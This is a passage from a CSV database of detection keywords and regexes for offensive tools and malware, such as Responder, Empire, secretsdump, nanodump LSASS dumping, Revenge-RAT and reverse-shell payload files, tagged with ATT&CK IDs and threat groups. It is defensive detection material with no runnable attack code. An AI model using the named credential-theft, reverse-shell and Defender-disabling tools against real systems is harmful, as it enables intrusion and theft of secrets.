NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57175" "*Responder/tools/MultiRelay/bin/Runas.exe*",".{0,1000}Responder\/tools\/MultiRelay\/bin\/Runas\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57176" "*Responder/tools/MultiRelay/bin/Syssvc.exe*",".{0,1000}Responder\/tools\/MultiRelay\/bin\/Syssvc\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57177" "*Responder\Responder.exe*",".{0,1000}Responder\\Responder\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","57178" "*ResponderConfigDump *",".{0,1000}ResponderConfigDump\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","57179" "*responder-http-off*",".{0,1000}responder\-http\-off.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57180" "*responder-http-on*",".{0,1000}responder\-http\-on.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57181" "*Responder-Session.log*",".{0,1000}Responder\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","#logfile","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57182" "*responder-smb-off*",".{0,1000}responder\-smb\-off.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57183" "*responder-smb-on*",".{0,1000}responder\-smb\-on.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57184" "*Responder-Windows*",".{0,1000}Responder\-Windows.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","57185" "*RestartKeePass.ps1*",".{0,1000}RestartKeePass\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","57187" "*RestartKeePass.ps1*",".{0,1000}RestartKeePass\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","57188" "*restic2john.py*",".{0,1000}restic2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","57200" "*Restore your data possible only buying private key from us*",".{0,1000}Restore\syour\sdata\spossible\sonly\sbuying\sprivate\skey\sfrom\sus.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57201" "*restore_signature.sh 
*.dmp*",".{0,1000}restore_signature\.sh\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#linux","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","57202" "*Restore-ServiceEXE -ServiceName *",".{0,1000}Restore\-ServiceEXE\s\-ServiceName\s.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - 
MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","57204" "*RestoreServiceModificationVariant.exe*",".{0,1000}RestoreServiceModificationVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57205" "*RestrictedAdmin.exe*",".{0,1000}RestrictedAdmin\.exe.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation tool","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","N/A","10","1313","237","2024-10-24T21:58:54Z","2018-07-25T23:38:15Z","57206" "*Results are on disk, enumerating next DC!*",".{0,1000}Results\sare\son\sdisk,\senumerating\snext\sDC!.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","57207" "*resuming a previous NTDS.DIT dump session *",".{0,1000}resuming\sa\sprevious\sNTDS\.DIT\sdump\ssession\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57208" "*resuming a previous NTDS.DIT dump session*",".{0,1000}resuming\sa\sprevious\sNTDS\.DIT\sdump\ssession.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57209" "*resutlStrBrwsrOfshit*",".{0,1000}resutlStrBrwsrOfshit.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","57210" "*-Retrieve Defender ASR Triggered Events -*",".{0,1000}\-Retrieve\sDefender\sASR\sTriggered\sEvents\s\-.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","57211" "*-Retrieve Defender Exclusion Paths Using Event Logs -*",".{0,1000}\-Retrieve\sDefender\sExclusion\sPaths\sUsing\sEvent\sLogs\s\-.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack 
Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","57212" "*Retrieve Domain Cached Credentials hashes from registry*",".{0,1000}Retrieve\sDomain\sCached\sCredentials\shashes\sfrom\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","57213" "*Retrieve LSA secrets stored in registry*",".{0,1000}Retrieve\sLSA\ssecrets\sstored\sin\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","57214" "*Retrieve password for the account arobbins in the domain testlab*",".{0,1000}Retrieve\spassword\sfor\sthe\saccount\sarobbins\sin\sthe\sdomain\stestlab.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57215" "*Retrieve password for the account arobbins in the domain testlab*",".{0,1000}Retrieve\spassword\sfor\sthe\saccount\sarobbins\sin\sthe\sdomain\stestlab.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57216" "*Retrieve password for the account jkohler in your current domain*",".{0,1000}Retrieve\spassword\sfor\sthe\saccount\sjkohler\sin\syour\scurrent\sdomain.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57217" "*Retrieve password for the account jkohler in your current domain*",".{0,1000}Retrieve\spassword\sfor\sthe\saccount\sjkohler\sin\syour\scurrent\sdomain.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - 
T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57218" "*Retrieve Wdigest credentials from registry*",".{0,1000}Retrieve\sWdigest\scredentials\sfrom\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","57219" "*returnvar/wce*",".{0,1000}returnvar\/wce.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","57220" "*return-wizard-rce-exim.txt*",".{0,1000}return\-wizard\-rce\-exim\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","57221" "*rev_kali_192_168_0_110_1234*",".{0,1000}rev_kali_192_168_0_110_1234.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by 
loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","57222" "*reveng007/C2_Server*",".{0,1000}reveng007\/C2_Server.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","57223" "*reveng007/DarkWidow*",".{0,1000}reveng007\/DarkWidow.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","57224" "*reveng007/Executable_Files*",".{0,1000}reveng007\/Executable_Files.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","57225" 
"*reveng007/ReflectiveNtdll*",".{0,1000}reveng007\/ReflectiveNtdll.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","57226" "*reveng007/SharpGmailC2*",".{0,1000}reveng007\/SharpGmailC2.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","57227" "*Revenge-RAT v.0.1.exe*",".{0,1000}Revenge\-RAT\sv\.0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57228" "*Revenge-RAT v.0.2.exe*",".{0,1000}Revenge\-RAT\sv\.0\.2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57229" 
"*Revenge-RAT v.0.3.exe*",".{0,1000}Revenge\-RAT\sv\.0\.3\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57230" "*Revenge-RAT v0.1.exe*",".{0,1000}Revenge\-RAT\sv0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57231" "*Revenge-RAT v0.2.exe*",".{0,1000}Revenge\-RAT\sv0\.2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57232" "*Revenge-RAT v0.3.exe*",".{0,1000}Revenge\-RAT\sv0\.3\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","57233" 
"*RevengeRAT-Stub-CSsharp*",".{0,1000}RevengeRAT\-Stub\-CSsharp.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","TA2541 - APT-C-36","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","1","N/A","N/A","10","10","92","39","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z","57234" "*reverse_shell_https.ps1*",".{0,1000}reverse_shell_https\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","57237" "*reverse_shell_minified.js*",".{0,1000}reverse_shell_minified\.js.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","57238" "*reverse_tcp_x64.rb*",".{0,1000}reverse_tcp_x64\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57239" "*reverse_win_http.rb*",".{0,1000}reverse_win_http\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57240" "*reverseDisableWinDef.cpp*",".{0,1000}reverseDisableWinDef\.cpp.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","57241" "*ReverseProxy.dll*",".{0,1000}ReverseProxy\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 